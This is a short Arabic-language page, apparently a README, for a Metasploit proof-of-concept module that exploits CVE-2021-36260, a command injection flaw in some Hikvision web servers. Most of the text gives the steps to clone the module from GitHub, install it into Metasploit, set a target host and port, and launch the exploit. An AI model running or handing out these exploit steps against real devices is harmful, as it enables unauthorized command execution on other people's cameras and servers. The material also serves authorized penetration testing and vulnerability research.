
نص الميتاسبلويت (POC) الخاص بـ CVE-2021-36260
سكربت metasploit (POC) حول CVE-2021-36260. وهي ثغرة حقن أوامر في خادم الويب لبعض منتجات Hikvision، حيث يمكن للمهاجم استغلال الثغرة لشن هجوم حقن أوامر عبر إرسال رسائل تحتوي على أوامر خبيثة.
git clone https://github.com/TaroballzChen/CVE-2021-36260-metasploit
cd CVE-2021-36260-metasploit
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp hikvision_web_server_build_210702_command_injection.py ~/.msf4/modules/auxiliary/scanner/http/
chmod +x ~/.msf4/modules/auxiliary/scanner/http/hikvision_web_server_build_210702_command_injection.py
msfconsole
set rhost <vuln ip/host>
set port <vuln port>
set ssl <default: false for http>
exploit
